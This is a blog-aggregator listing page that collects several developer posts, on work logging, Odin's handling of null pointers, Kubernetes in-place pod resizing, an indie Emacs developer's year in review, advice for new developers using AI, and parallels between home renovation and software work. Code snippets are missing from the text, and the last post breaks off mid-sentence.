Posts in Java (20 found)
Fredrik Meyer 3 days ago

Writing a work log

About a year ago I started writing a “work diary”. The process is simple: at the end of the day, I write a few sentences of what I did that day at work. It has a few benefits: I can ask an LLM questions about what I have spent time on. Here’s an example: Or this one: Based on the extensive work logs, collaboration with team members, involvement in complex debugging, API development, feature implementation, and participation in meetings and project management, it can be estimated that the programmer is at a senior level. Here I use the CLI tool by Simon Willison. I use Emacs for Org Mode and for Magit . To write the log I press 1 to open the “work Org Mode file”. Then I navigate to the work diary (headlines are “Work log”, month, day). In Org Mode, insert the current date. Then I write a few sentences. Here’s an example from last Friday (loosely translated): Sleepy today. Deployed § 11-4 second part out in the dev environment, fixed a small bug (it didn’t consider manual income). Otherwise spent time on unrelated small fixes. Used Copilot to get ktor-openapi-generator to support -annotations. Made a Grafana-dashboard for errors logs per app. I have this in my Emacs config: Easier to know what I should do the next day if I didn’t finish a task. If I’m stuck with something, I can write the problem down, effectively rubber-ducking with myself. I have a belief that writing a problem down will help clarify thoughts. I can ask an LLM questions about what I have spent time on. Here’s an example: Java Spring Boot API Development Test Automation Microservices CI/CD (Continuous Integration/Continuous Deployment) It can help me realize issues I should focus more or less on. Asking the LLM again, it pointed out that a lot of time is spent fixing bugs or attending meetings. It suggested to set aside dedicated time for deep work , so that complex coding tasks can be handled without interruption. It gives myself some traceability. I can verify that I did actually work a particular day, or that I worked on that particular thing at a particular day. I have this in my Emacs config: ↩

0 views
Ginger Bill 4 days ago

Mitigating the Billion Dollar Mistake

This article is continuation to: Was it really a Billion Dollar Mistake? . After reading a lot of the comments on numerous social media sites on the original article , I think I need to clarify a lot more. The main points I wanted to clarify: A lot of commentors based their complaints in their experience with languages like Java/C#/Python/etc, and the issues with null-pointer-exceptions (NPEs) in them. What I think a lot of people seemed to forget is that in those languages, virtually everything is a pointer, unlike in a language like C/Go/Odin which has explicit pointers. When everything is a pointer, it is exponentially more likely that you will hit a pointer that is invalid. And in the case of a managed (garbage collected) language, that invalid pointer will most definitely be a null pointer. This is why I can understand the problem of having pointers in such languages. But I think this still missed the point of what I trying to state, that the reason even exists in those languages is because you can declare a variable without an explicit initialization value: Because you can declare such a thing in a language like Java, then there are three options to try and mitigate this design flaw: Unfortunately existing languages like Java cannot have these problems solved, but newer languages that want to stylize themselves similar to that could solve them. One of the issues is that languages like Java added maybe/option/optional types too late AND it is not the default behaviour. The first approach is the current status quo, the second approach keeps the implicit value declarations but adds more checks, whilst the third approach requires doing explicit value declarations. The enforcement of maybe types as the default pointer/reference type leads to two possibilities: Version 1 would be something like this: but because of the ergonomic pains, can also lead to unwrapping cases, which are practically equivalent to NPEs: At least with an , it is a little clearer that a panic could happen. But it can also just be an early-out too like with Odin’s : Version 2 is a bit weirder, since it doesn’t remove the concept of but propagates further up the expression tree. The first approach is unergonomic to use, especially in a language where virtually everything is a pointer/reference, and with the addition of unwrapping which just panics on , it’s practically reinvented NPEs with more steps. As for the second approach, I’d argue is very bug prone if it was the default, since you cannot trivially know where the arose from since it was just passed up the stack 2 . Therefore most people think the third approach to mitigating pointers is the “obvious” and “trivial” approach: explicit individual initialization of every value/element everywhere . One thing which I commonly saw was people saying was that I “missed the point” that null safety is not about protecting from common invalid memory access but rather it’s about clarifying the states that a pointer can be in the type system itself, whether it cannot be null or maybe it could be null. I already knew this, and I find it bizarre 3 that people did not understand that from the article. The point I was trying to get across which most people seemed to either ignore or not understand was that the approach of requiring explicit initialization of every element everywhere comes with a cost and trade-offs. Most people who bring this up as “the solution” think there was either no cost or they think the cost is worth it. The former group are just wrong, and the latter group are the point I was focusing the article at in the first place: you don’t actually understand the costs fully if you are answering the way that you do. I understand this sounds “condescending” to some people, but I am not trying to be. The point I am arguing is far from the common view/wisdom, and thus I tried to explain my position. Why would a person listen to someone with a “fringe” view? “Fringe” views are typically wrong in other areas of life, so it makes sense to apply that heuristic to the domain of programming too. I don’t care if people agree with me or not, rather I wish people actually understand it and then comment. But as a systems programmer, I deal with memory all the time, and null pointers are the least common kind of invalid memory that I have to deal with, and the other kinds were not handled by the type system, nor would be handled with solving the problems of null. No, this is not saying “well just because you cannot solve problem X with Y, therefore don’t solve either”, it’s saying that they are different problems, and empirically they are just different with different kinds of severity and ways to mitigate them. I am not saying you shouldn’t try to solve either problem if you are designing your own language, but rather they are both kinds of invalid memory, but solutions to mitigate the problems are completely different in kind 4 . For a managed language like Java, the cost of explicit initialization of every element everywhere is so little in comparison to the rest of the language, that approach is honestly fine. But for a language like the one I have designed and created—Odin—the cost of non-zero initialization is extremely costly as things scale. This simple/naïve approach looks like this in a pseudo-C: But if you use a lot of pointers everywhere, the initialization becomes a lot more complex, and non-linear too. People argue the need to express non-nullable pointers, and either version 1 of the previous approach or this explicit approach are effectively the only ways of doing this. You could tell the compiler to assume the pointer is never null (e.g. or ), but those are not guarantees in the type system, just you telling the compiler to assume it is never . The non-nullability is not possible outside of those two approaches. This was the entire point I was making between the Individual-Element Mindset and the Group-Element Mindset is that the individual-element mindset lends itself well to thinking about individual elements like this. And as such, it doesn’t really think about the cost of thinking in individual elements as compounding to something expensive. I’ve been in projects where a lot of the time in a program in spent in the destructors/ traits of individual elements, when all they are doing is trivial things which could have been trivially done in bulk. Most people don’t consider these as “costs” nor that there are trade-offs to this approach to programming, rather it’s “just the way it is”. There is the other aspect where if the explicit initialization is applied to every type, not just ones which contains pointers/references, then it can be less ergonomic to type and have visual noise: 5 This constant syntactic noise can be tiring and detracts from what is actually going on. With the implicit zero initialization that I had in Odin, it has worked out really well. Many might expect it to be confusing, but it isn’t and you can rely on it and becomes very natural to use. As the creator and main architect of Odin, a lot of Odin’s design has been to fix a lot of the problems I and many others faced with C, whilst still not veering too far from the general feel of C. Odin does have pointers by default, but in practice they are a very rare problem due numerous features and constructs of the language. One of the reasons for pointers in C is caused to due the lack of a proper array type. Odin has proper array types and does not implicitly demote arrays to pointers. Odin has slices which replace a lot of the needs for pointers and pointer arithmetic, and because array types (including slices) are bounds checked, that already solves many of the problems that would have occurred in C with treating pointers as arrays, which may or may not have an associated length to check against. Odin also has tagged unions and multiple return values. Tagged unions should be “obvious” to the people who had be complaining about the initial article, but the use of tagged unions isn’t necessarily there to solve the pointer problem. Odin’s is an example of a maybe/option type, which is just a built-in discriminated union, with the following definition: And due to the design of Odin’s , if a union only has one variant and that variant is any pointer-like type, no explicit tag is stored. The state of the pointer-like value also represents the state of the . This means that . Another reason why C has problems with pointers is the lack of way to state a parameter to a procedure as being optional. C doesn’t have default values for parameters, nor any way in its type system to express this. C’s type system is just too poor and too weak. This is why people unfortunately use pointers as a way to do thus, since they can write . However, it is rare to see in Odin code be used to indicate pointers except when interfacing with foreign code, or optional parameters to a procedure. This is because the need for a pointer itself is quite rare. There are multiple reasons why: However one of the main reasons why pointers are rarely a problem in Odin is because of multiple return values. Multiple return values when used for this manner, are akin (but not semantically equivalent) to something like a type in other languages 6 . When a procedure returns a pointer, it is either assumed to be never OR accompanied with another value to indicate its validity, commonly in the form of a boolean or : And coupled with the constructs ( , , , ), , and named return values, a lot of those issues never arise: Odin is designed around multiple return values rather than / constructs, but this approach does in practice does solve the same kinds of problems. Before people go “well the assumption is not enforced in the type system”, remember where all of this derives from: Odin allows for implicit declarations of variables without an explicit initialization value. And as the designer of Odin, I think enforcing that is both quite a high cost (see the individual-element vs grouped-elements mindsets) and far from the original approach to programming C. I know this is not going to convince people, but it’s effectively trying to make someone think like another person, which is never easy, let alone always possible to do in the first place. And it’s not a mere “aesthetic preference” either. This very little design decision has MASSIVE architectural consequences which lead to numerous performance problems and maintenance costs as a project grows. Null pointer exceptions (NPEs) are in a category of constructs in a language which I class as “panic/trap on failure”. What I find interesting is that there are numerous other things in this category, but many people will normally take a different approach to those constructs compared to NPEs, due to whatever reason or bias that they have. The canonical example is integer division by zero. Instinctually, what do you think division by zero of an integer should result it? I’d argue most people will say “trap”, even if a lot of modern hardware (e.g. ARM64 and RISC-V) does not trap, and only the more common x86-related architectures do trap. Odin does currently 7 define the behaviour of division by zero to “trap” only because of this assumption, but we have considered changing this default behaviour. Odin does allow the programmer to control this behaviour at a global level or on a per-file level basis if they want a different behaviour for division by zero (and consequentially by zero). But some languages such as Pony , Coq, Isabelle, etc actually define division by zero of an integer to be . This is because it can help a lot of theorem provers . But there is the other question of production code. One of the main arguments against NPEs (especially in languages like Java) is that it causes a crash. So in the case of division by zero, do you want this to happen? Or would you prefer all integer division to be explicitly handled, or default to a predictable/useful value, like ?—which prevents crashing in the first place. Another common example of “panic on failure” is languages with runtime bounds checking. If is out of bounds, most languages just panic. It’s rare to find a language that returns a on every array access to prevent an out of bounds. Not even languages like OCaml do this. NPEs, division by zero (if traps), and runtime bounds checking are all examples of this kind of “panic on failure”, but people rarely treat them as being the same, even if they are of the same kind of problem. Honestly, no. I understand it might be common for beginners to a language like C to have many pointer related problems, but they will also have loads of other problems too. However as you get more competent at programming, that kind of problem is honestly the least of your problems. I honestly think a lot of this discussion is fundamentally a misunderstanding of different perspectives rather than anything technical. A lot of what some people think are their “technical opinions” are merely just aesthetic judgements. And to be clear, aesthetic judgements are not bad, but they are not necessarily technical. But I’d argue most people are not applying their opinions consistently when it comes to the category of “panic on failure”, and NPEs are no different; they only seem more of a problem to them either because of the existence of the name of the “Billion Dollar Mistake” or because they encounter it more. I know a lot of people view the explicit individual initialization of every element everywhere approach as the “obvious solution”, as it seems like low-hanging fruit. As a kid, I was told to not pick low-hanging fruit, especially anything below my waist. Just because it looks easy to pick, a lot of it might not be unpicked for a reason. It does not mean that you should or should not pick that fruit, but rather you need to consider the trade-offs. If you honestly think the costs of explicit individual initialization of every element everywhere are worth it for the language you are working in or developing, then great! But at least know the trade-offs of that approach. For Odin, I thought it was not worth the cost—compared to the alternative ways of mitigating the problem empirically. Most of the bad criticisms just came from people who didn’t read the article or didn’t read past a couple paragraphs. That’s why I wanted to state this comment very clearly.  ↩︎ This is partially why I do not like exceptions as error handling in many languages. It is not obvious where things are thrown/raised from and they encourage the practice of ignoring them until the latest possible space. I discuss that problem in The Value Propagation Experiment Part 2 .  ↩︎ I understand what type systems do and their benefits, and it is a little insulting when people assume my knowledge (or lack of) without doing a modicum of review.  ↩︎ In the case of the other invalid memory addresses, linear/affine substructural type systems with lifetime semantics can help with this (e.g. Rust) but they come at another cost in terms of language ergonomics and restrictions. Language design is hard.  ↩︎ I know typing is never the bottleneck in programming, but the visual noise aspect is a big one when you are trying to scan (not necessarily read ) code. I want to see the pattern and not be swamped with syntactic noise.  ↩︎ I know a result type is a kind of sum type and multiple return values are more akin to a product type, but how different languages want to be used and expressed, this works out fine in practice for the same kinds of problems. Please don’t give me a FP rant.  ↩︎ At the time of writing, I am not sure which approach is the better one: trap or zero by default, but we allow for all four options in the Odin compiler. Division by zero for floats results in “Inf” and that’s not necessarily as much of a problem in practice, so why would division by zero be as bad?  ↩︎ Null pointer dereferences are empirically the easiest class of invalid memory addresses to catch at runtime, and are the least common kind of invalid memory addresses that happen in memory unsafe languages. I do think it was a costly mistake but the “obvious solutions” to the problem are probably just as costly , if not more so, but in very subtle ways which most people neglected to understand in the article 1 . I think that even if Tony Hoare didn’t “invent” pointers, within a couple years someone else would have. I don’t think it’s a “mistake” the programming world was ever going to avoid. I am talking about languages that run on modern systems with virtual memory, not embedded systems where you interact with physical memory directly. Those platforms in my opinion need much different kinds of languages which unfortunately do not exist yet. I was also talking about languages akin to C and Odin, not languages that run on a VM or have “everything be a reference”. Allow for pointers (and just deal with it) All pointers are implicitly maybe types (e.g. in Java) Require all explicit initialization of every element everywhere to assume cannot happen, along with things like maybe types. Requiring each reference to be checked if it is . Check if a value is and propagate that up the expression tree. Odin has slice types Odin has multiple return values to allow for out-only parameters, which could be ignored with Odin isn’t a “everything is a pointer” kind of language: pointers have to be explicit typed to exist. Writing pointer types as value declarations is less common due to type inference e.g. is more much common than: . All bits set ( ) The same value ( ) Most of the bad criticisms just came from people who didn’t read the article or didn’t read past a couple paragraphs. That’s why I wanted to state this comment very clearly.  ↩︎ This is partially why I do not like exceptions as error handling in many languages. It is not obvious where things are thrown/raised from and they encourage the practice of ignoring them until the latest possible space. I discuss that problem in The Value Propagation Experiment Part 2 .  ↩︎ I understand what type systems do and their benefits, and it is a little insulting when people assume my knowledge (or lack of) without doing a modicum of review.  ↩︎ In the case of the other invalid memory addresses, linear/affine substructural type systems with lifetime semantics can help with this (e.g. Rust) but they come at another cost in terms of language ergonomics and restrictions. Language design is hard.  ↩︎ I know typing is never the bottleneck in programming, but the visual noise aspect is a big one when you are trying to scan (not necessarily read ) code. I want to see the pattern and not be swamped with syntactic noise.  ↩︎ I know a result type is a kind of sum type and multiple return values are more akin to a product type, but how different languages want to be used and expressed, this works out fine in practice for the same kinds of problems. Please don’t give me a FP rant.  ↩︎ At the time of writing, I am not sure which approach is the better one: trap or zero by default, but we allow for all four options in the Odin compiler. Division by zero for floats results in “Inf” and that’s not necessarily as much of a problem in practice, so why would division by zero be as bad?  ↩︎

0 views

Good Morning Jan 8 2026

Hello all. I just finished the Core 2 part of the CompTIA A+ exam, and I can finally breathe. School has also been out for winter break, but between moving, parties, and holiday cheer, I have yet to post. No doubt I've been thinking about posting. I have two posts in drafts and more ideas on the shelf to visit. I have in fact been reading the posts of everyone on my feed as well, even if I haven't been replying. We'll see how long I can find time to post when my Spring semester rolls around 👀 Subscribe via email or RSS

0 views

Tyrannies and servilities

In an effort to understand the then-present state of women in the workplace, Virginia Woolf goes looking to the newspapers, where she finds a number of letters and articles declaiming that women have too much liberty, that they are taking jobs that men could do, and that they are neglecting their domestic duties in the process. She finds an immediate parallel to those complaints in other events of the day: There, in those quotations, is the egg of the very same work that we know under other names in other countries. There we have in embryo the creature, Dictator as we call him when he is Italian or German, who believes that he has the right whether given by God, Nature, sex or race is immaterial, to dictate to other human beings how they shall live; what they shall do. Let us quote again: “Homes are the real places of the women who are now compelling men to be idle. It is time the Government insisted upon giving work to more men, thus enabling them to marry the women they cannot now approach.” Place it beside another quotation: “There are two worlds in the life of the nation, the world of men and the world of women. Nature has done well to entrust the man with the care of his family and the nation. The woman’s world is her family, her husband, her children, and her home.” One is written in English, the other German. But where is the difference? Are they not both saying the same thing? Are they not both the voices of Dictators, whether they speak English or German, and are we not all agreed that the dictator when we meet him abroad is a very dangerous as well as a very ugly animal? And he is here among us, raising his ugly head, spitting his poison, small still, curled up like a caterpillar on a leaf, but in the heart of England. Is it not from this egg, to quote Mr Wells again, that “the practical obliteration of [our] freedom by Fascists or Nazis” will spring? The first quotation is from the Daily Telegraph ; the second is Hitler. (I would draw comparisons to the present moment, but they seem to draw themselves.) Woolf later concludes: It suggests that the public and the private worlds are inseparably connected; that the tyrannies and servilities of the one are the tyrannies and servilities of the other. That is, the tyranny of government is the tyranny of the workplace is the tyranny of the home. Each begets and creates the other. But perhaps that also suggests the reverse: pull the thread on one, and watch as they all come undone. View this post on the web , subscribe to the newsletter , or reply via email .

0 views
xenodium 2 weeks ago

My 2025 review as an indie dev

In 2024, I took the leap to go indie full-time. By 2025, that shift enabled me to focus exclusively on building tools I care about, from a blogging platform, iOS apps, and macOS utilities, to Emacs packages. It also gave me the space to write regularly, covering topics like Emacs tips, development tutorials for macOS and iOS, a few cooking detours, and even launching a new YouTube channel . The rest of this post walks through some of the highlights from 2025. If you’ve found my work useful, consider sponsoring . Now let’s jump in. For well over a decade, my blogging setup consisted of a handful of Elisp functions cobbled together over the years. While they did the job just fine, I couldn't shake the feeling that I could do better, and maybe even offer a blogging platform without the yucky bits of the modern web. At the beginning of the year, I launched LMNO.lol . Today, my xenodium.com blog proudly runs on LMNO.lol . LMNO.lol blogs render pretty much anywhere (Emacs and terminals included, of course). 2026 is a great year to start a blog ! Custom domains totally welcome. Sure, there are plenty of journaling and note-taking apps out there. For one reason or another, none of them stuck for me (including my own apps). That is, until I learned a thing or two from social media. With that in mind, Journelly was born : like tweeting, but for your eyes only . With the right user experience, I felt compelled to write things down all the time. Saving to Markdown and Org markup was the mighty sweet cherry on the cake. As a Japanese language learning noob, what better way to procrastinate than by building yet another Kana-practicing iOS app? Turns out, it kinda did the job. Here's mochi invaders , a fun way to practice your Kana 2025 brought us the likes of Claude Code, Gemini CLI, Goose, Codex, and many more AI/LLM CLI agents. While CLI utilities have their appeal, I wanted a native Emacs integration, so I simply ignored agents for quite some time. I was initially tempted to write my own Emacs agent, but ultimately decided against it. My hope was that agent providers would somehow converge to offer editor integration, so I could focus on building an Emacs integration while leveraging the solid work from many teams producing agents. With LLM APIs historically fragmented, my hope for agent convergence seemed fairly far-fetched. To my surprise, ACP ( Agent Client Protocol ) was announced by Zed and Google folks . This was the cue I had been waiting for, so I set out to build acp.el , a UX agnostic elisp library, followed by an actual client: agent-shell . I'm fairly happy with how 's been shaping up. This is my most popular package from 2025, receiving lots of user feedback . If you're curious about the feature-set, I've written about 's progress from early on: While agent-shell is the new kid on the block, chatgpt-shell received DeepSeek, Open Router, Kagi, and Perplexity support , in addition to a handful of other improvements and bugfixes. While most of what I share usually ends up as a blog post, this year I decided to try something new. I started the Bending Emacs YouTube channel and posted 8 episodes: Enjoying the content? Leave me a comment or subscribe to my channel . While I enthusiastically joined the Emacs Carnival , I didn't quite manage monthly posts. Having said that, when I did participate, I went all in, documenting my org experience over the last decade . Ok well… I also joined in with my elevator pitch ;) While migrating workflows to Emacs makes them extra portable across platforms, I've also accumulated a bunch of tweaks enhancing your Emacs experience on macOS . While we're talking macOS, I typically like my desktop free from distractions, which includes hiding the status bar. Having said that, I don't want to lose track of time, and for that, I built EverTime , an ever-present floating clock (available via Homebrew). Emacs ships with a perfectly functional world clock, available via , but I wanted a little more, so I built time-zones . Also covered in: For better or worse, I rely on WhatsApp Messenger. Migrating to a different client or protocol just isn't viable for me, so I did the next best thing and built wasabi , an Emacs client ;) While not a trivial task, wuzapi and whatsmeow offered a huge leg up. I wanted tighter Emacs integration, so I upstreamed a handful of patches to add JSON-RPC support, plus easier macOS installation via Homebrew . Details covered in a couple of posts: While both macOS and iOS offer APIs for generating URL previews, they also let you fetch rich page metadata. I built rinku , a tiny command-line utility, and showed how to wire it all up via eshell for a nifty shell experience. With similar magic, you can also get a neat experience. I always liked the idea of generating some sort of art or graphics from a code base, so I built one , a utility to transform images into character art using text from your codebase. Also covered in a short blog post . Emacs is just about the perfect porcelain for command-line utilities. With little ceremony, you can integrate almost any CLI tool. Magit remains the gold standard for CLI integration. While trimming videos doesn't typically spring to mind as an Emacs use case, I was pleasantly surprised by the possibilities . While I've built my fair share of Emacs packages , I'm still fairly new at submitting Emacs features upstream. This year, I landed my send-to (aka sharing on macOS) patch . While the proposal did spark quite the discussion , I'm glad I stuck with it. Both Eli and Stefan were amazingly helpful. This year, I also wanted to experiment with dictating into my Emacs text buffers, but unfortunately dictation had regressed in Emacs 30 . Bummer. But hey, it gave me a new opportunity to submit another patch upstream . Ready Player , my Emacs media-playing package received further improvements like starring media (via Emacs bookmarks), enabling further customizations, and other bug fixes. Also showcased a tour of its features . Hope you enjoyed my 2025 contributions. Sponsor the work. agent-shell 0.25 updates agent-shell 0.17 improvements + MELPA agent-shell 0.5 improvements Introducing Emacs agent-shell (powered by ACP) Introducing acp.el So you want ACP (Agent Client Protocol) for Emacs? Bending Emacs - Episode 1: Applying CLI utils Bending Emacs - Episode 2: From vanilla to your flavor Bending Emacs - Episode 3: Git clone (the lazy way) Bending Emacs - Episode 4: Batch renaming files Bending Emacs - Episode 5: Ready Player Mode Bending Emacs - Episode 6: Overlays Bending Emacs - Episode 7: Eshell built-in commands Bending Emacs - Episode 8: completing-read time-zones now on MELPA. Do I have your support? Emacs time-zones WhatsApp from you know where Want a WhatsApp Emacs client? Commits: 1,095 Issues created: 37 PRs reviewed: 106 Average commits per day: ~3 EverTime - An ever present clock for macOS acp.el - An ACP implementation in Emacs lisp agent-shell - A native Emacs buffer to interact with LLM agents powered by ACP diverted - Identify temporary Emacs diversions and return to original location emacs-materialized-theme - An Emacs theme derived from Material homebrew-evertime - EverTime formula for the Homebrew package manager homebrew-one - Homebrew recipe for one homebrew-rinku - Homebrew recipe for rinku one - Transform images into character art using text from your codebase rinku - Generate link previews from the command line (macOS) time-zones - View time at any city across the world in Emacs video-trimmer - A video-trimming utility for Emacs wasabi - A WhatsApp Emacs client powered by wuzapi and whatsmeow Journelly 1.3 released: Hello Markdown! agent-shell 0.25 updates Bending Emacs - Episode 8: completing-read At one with your code Bending Emacs - Episode 7: Eshell built-in commands Rinku: CLI link previews Bending Emacs - Episode 6: Overlays WhatsApp from you know where Want a WhatsApp Emacs client? Will you fund it? Bending Emacs - Episode 5: Ready Player Mode agent-shell 0.17 improvements + MELPA time-zones now on MELPA. Do I have your support? Bending Emacs - Episode 4: Batch renaming files Emacs time-zones Bending Emacs - Episode 3: Git clone (the lazy way) agent-shell 0.5 improvements Bending Emacs - Episode 2: From vanilla to your flavor Bending Emacs - Episode 1: Applying CLI utils Introducing Emacs agent-shell (powered by ACP) Introducing acp.el So you want ACP (Agent Client Protocol) for Emacs? Diverted mode Who moved my text? Dired buffers with media overlays Brisket recipe A tiny upgrade to the LLM model picker Emacs elevator pitch Emacs as your video-trimming tool macOS dictation returns to Emacs (fix merged) Writing experience: My decade with Org Interactive ordering of dired items Patching your Homebrew's Emacs Plus (macOS) Emacs send-to (aka macOS sharing) merged upstream Mochi Invaders now on the App Store Markdown is coming to Journelly EverTime available via Homebrew Journelly 1.2 released Ranking Officer now on the App Store Awesome Emacs on macOS Journelly 1.1 released LLM text chat is everywhere. Who's optimizing its UX? A richer Journelly org capture template Journelly: like tweeting but for your eyes only (in plain text) Journelly vs Emacs: Why Not Both? The Mac Observer showcases Journelly Journelly open for beta DeepSeek, Open Router, Kagi, and Perplexity join the chat Keychron K3 Pro: F1-F12 as default macOS keys E-ink bookmarks Sourdough bookmarks Cardamom Buns recipe A tour of Ready Player Mode A platform that moulds to your needs Blogging minus the yucky bits of the modern web

0 views
alikhil 2 weeks ago

Kubernetes In-Place Pod Resize

About six years ago, while operating a large Java-based platform in Kubernetes, I noticed a recurring problem: our services required significantly higher CPU and memory during application startup. Heavy use of Spring Beans and AutoConfiguration forced us to set inflated resource requests and limits just to survive bootstrap, even though those resources were mostly unused afterwards. This workaround never felt right. As an engineer, I wanted a solution that reflected the actual lifecycle of an application rather than its worst moment. I opened an issue in the Kubernetes repository describing the problem and proposing an approach to adjust pod resources dynamically without restarts. The issue received little discussion but quietly accumulated interest over time (13 👍 emoji reaction). Every few months, an automation bot attempted to mark it as stale, and every time, I removed the label. This went on for nearly six years… Until the release of Kubernetes 1.35 where In-Place Pod Resize feature was marked as stable . In-Place Pod Resize allows Kubernetes to update CPU and memory requests and limits without restarting pods, whenever it is safe to do so. This significantly reduces unnecessary restarts caused by resource changes, leading to fewer disruptions and more reliable workloads. For applications whose resource needs evolve over time, especially after startup, this feature provides a long-missing building block. The new field is configured at the pod spec level. While it is technically possible to change pod resources manually, doing so does not scale. In practice, this feature should be driven by a workload controller. At the moment, the only controller that supports in-place pod resize is the Vertical Pod Autoscaler (VPA). There are two enhancement proposals enable this behavior: AEP-4016: Support for in place updates in VPA which introduces update mode AEP-7862: CPU Startup Boost which is about temporarily boosting pod by giving more cpu during pod startup. This is conceptually similar to the approach proposed in my original issue. Here is an example of Deployment and VPA using both AEP features: With such configuration pod will have doubled cpu requests and limits during startup. During the boost period no resizing will happen. Once the pod reaches the state, the VPA controller scales CPU down to the currently recommended value. After that, VPA continues operating normally, with the key difference that resource updates are applied in place whenever possible. Does this feature fully solve the problem described above? Only partially. First, most application runtimes still impose fundamental constraints. Java and Python runtimes do not currently support resizing memory limits without a restart. This limitation exists outside of Kubernetes itself and is tracked in the OpenJDK project via an open ticket . Second, Kubernetes does not yet support decreasing memory limits, even with in-place Pod Resize enabled. This is a known limitation documented in the enhancement proposal for memory limit decreases . As a result, while in-place Pod Resize effectively addresses CPU-related startup spikes, memory resizing remains an open problem. In place Pod Resize gives a foundation for cool new features like StartupBoost and makes use of VPA more reliable. While important gaps remain, such as memory decrease support and scheduling race condition , this change represents a meaningful step forward. For workloads with distinct startup and steady-state phases, Kubernetes is finally beginning to model reality more closely. AEP-4016: Support for in place updates in VPA which introduces update mode AEP-7862: CPU Startup Boost which is about temporarily boosting pod by giving more cpu during pod startup. This is conceptually similar to the approach proposed in my original issue.

0 views
Dan Moore! 3 weeks ago

What New Developers Need to Know About Working with AI

It’s been a few years since I wrote Letters to a New Developer , about what I wish I’d known when I was starting out. The industry has changed with the advent and acceleration of generative AI and the implications of these tools on coding and software creation. So I wanted to write a quick update to give advice to developers who are entering this world with AI. It’s important to understand what developers actually do. They are not responsible for writing code. They are not responsible for liking technology. Like other employees, developers are responsible for  taking their particular skill set and using it to solve problems that a business or organization needs solved. Whether that’s a one-person shop organizing their customers’ data or a large organization like Walmart, Amazon or the US military trying to improve their logistics, there are goals to achieve. For a developer building, maintaining and improving software is the main means to achieve those goals. This does not change in the world of AI. The role of a developer is still to understand technology, how it can be applied, where its limits are and to build it with the quality and appropriate flexibility for the business situation. What do I mean by the last part? If you’re building a script to transfer data from one system to another one time, then a throwaway script that doesn’t have error checking, that doesn’t have proper variable names, that doesn’t have abstraction is appropriate. If, on the other hand, you’re creating foundational architectural components of a long-lived system, you need to think about all the things that make software more maintainable . In either case as a developer your role is clear. It’s not to code the software. It’s to take the business requirements, understand the domain and build a solution that meets the business’s requirements for a given level of flexibility, complexity and completeness. That job doesn’t change whether you’re using: As a dev, your job is to understand the technical trade-offs, use the right tools and meet the business or organization’s needs. Now as a new developer, how do you learn to leverage genAI in a way that is going to help your career rather than hurt it? It’s tough out there to get your job as a new dev and ignoring AI is going to make it even tougher. It’s important that you learn how to use this tool and use it well. But AI as a tool is much more like Google search results than it is like a compiler error. A compiler error is deterministic and will give you the same message each time you compile the code. The output of an LLM is not deterministic, just as when you search for guidance for building software on Stack Overflow or your team. With these sources of knowledge, you as a developer need to learn judgment. You need to learn when to trust genAI and when not to trust it. Do this by starting small, asking for links, and checking the output of an AI against other sources. These include other AIs and published documentation. You’re building your sense of judgment and intuition about the system you are improving. Use it to augment your understanding, not replace it . When an AI hallucinates, don’t throw the baby out with the bathwater and never touch genAI again. Instead learn to sniff out when an AI is generating garbage and when it is generating helpful code that will accelerate things. A good course of action is to use AI to generate easily verifiable code where errors are low impact. An example is writing tests with AI, especially unit tests, especially in a statically typed language. It’s very easy to tell if the tests that are written are working or not. Don’t forget to instruct the AI to fully flesh out the tests, you don’t want any “return true” nonsense. Another example is read-only queries. If you have an understanding of the data you can verify whether or not the SQL the LLM creates gives you the correct answer. Write multiple queries because they are so low effort, and use them to double check answers. If you were looking for a count of a particular set of customers, ask it for multiple different ways, including a count of one particular kind of customer and a count of all customers grouped by type. This lets you see if things match up. The goal is not trusting blindly but instead using the tool to accelerate delivery of solutions to the problems the business wants you to solve. But you want to do so in a way that is going to give you confidence that the solutions you deliver are real. By the way, the value of such intuition and judgement is high for all developers. I think that it’s even more valuable for newer developers. If you would like to purchase my book, “Letters To a New Developer” for more of this kind of insight, there’s a sale going on right now through the end of the year. You can use this link to buy my book for just $24 . (This is a better deal than I get with my author’s discount.) machine code assembly a non-memory managed language like C a memory managed language like Java or spec-driven development.

1 views
./techtipsy 1 months ago

Drawing parallels between home renovation and software development

I had the opportunity to do some slight renovation on an apartment. It was nothing fancy, it involved the following: I expected it to take a few months’ worth of weekends. Took over half a year. Oops. During that time I had a lot of time to think about all sorts of things. It was a nice zen activity for me if we leave out the part where I was physically exhausted, but on the bright side I was mentally relaxed by the time I got back to work. And by the time I was mentally exhausted after a long work week, I was ready to do some physical work. My previous experience with construction and renovation work is pretty minimal. I have a toolbox, and I’m a tool myself, but that was pretty much it. This experience was characterized by a lot of improvisation and a little bit of googling for the parts where I felt genuinely out of my depth, such as installing the laminate floor. I realized quite soon that renovation and software development are very similar in a lot of ways. After all, both involve building something and they both contribute to my back pain and deteriorate my dwindling sanity. Here are some parallels that I observed during the many, many weekends spent renovating an apartment. I did my best to reasonably plan ahead and calculated things like floor and wall surface areas with a reasonable degree of accuracy, plus 10% buffer. That buffer paid off big time. The part where you have to prepare a surface for plastering and painting is super annoying, but the end result is dependent on this step going well. It’s like planning in software development: if you just start coding and ignore the rest, you will end up with a crappy result. Making a few initial up-front investments into dust-proofing a room during renovations is also a wise investment. Learned that a bit too late myself. I felt it multiple times during the renovation work, sometimes you just get into a groove and the time just flies. It was usually interrupted by my body letting me know that I should probably take a break and eat something. Doing something manually sucks. The speed at which a sanding machine can make the walls nice and smooth is crazy. The feeling is comparable to writing Java in Notepad vs IntelliJ IDEA, one is infinitely more convenient and faster, but costs more in money. At some point it’s counterproductive, and you’re unlikely to use them all, but nevertheless it’s fun to browse around and pick something new up. Kind of like opening up awesome-selfhosted list to see what else you can put on your home server. It’s terrible to redo something you already did, but sometimes it has to be done for the best end result. I didn’t do this for one room, and it bit me in the butt a few months later with the floor. Oh well. Sometimes you’ll discover an exposed electrical wire behind the wallpaper. Sometimes removing the baseboard removes a lot of the plaster on the wall. Sometimes you will trip over the big bucket of water and cause a big mess. Sometimes you’ll unknowingly drill into an electrical cable. It happens. Be ready for it. I blew past any pessimistic estimates that I set up for myself, mainly because of the fun little surprises I had during the construction work. I knowingly left some work unaddressed because tackling it would’ve required a significant time and money investment. It’s fine, we’ll get to it later, I promise. With one area it has been working out fine, but in other area I am starting to suspect that doing things the proper way would’ve probably been a good idea. It is what it is. And for a good reason. I’m starting to think that hiring one would have helped avoid a lot of the headache, but then I would have missed out on learning things myself and learning more about the history of the apartment. Hourly rates are high in both construction and software development, unfortunately. In construction, literally. With the hallways, I could not be arsed to do everything properly there as well and did things a bit differently and more creatively, and it turned out okay. MVP mindset! I asked a local electrician for opinions on the electrical 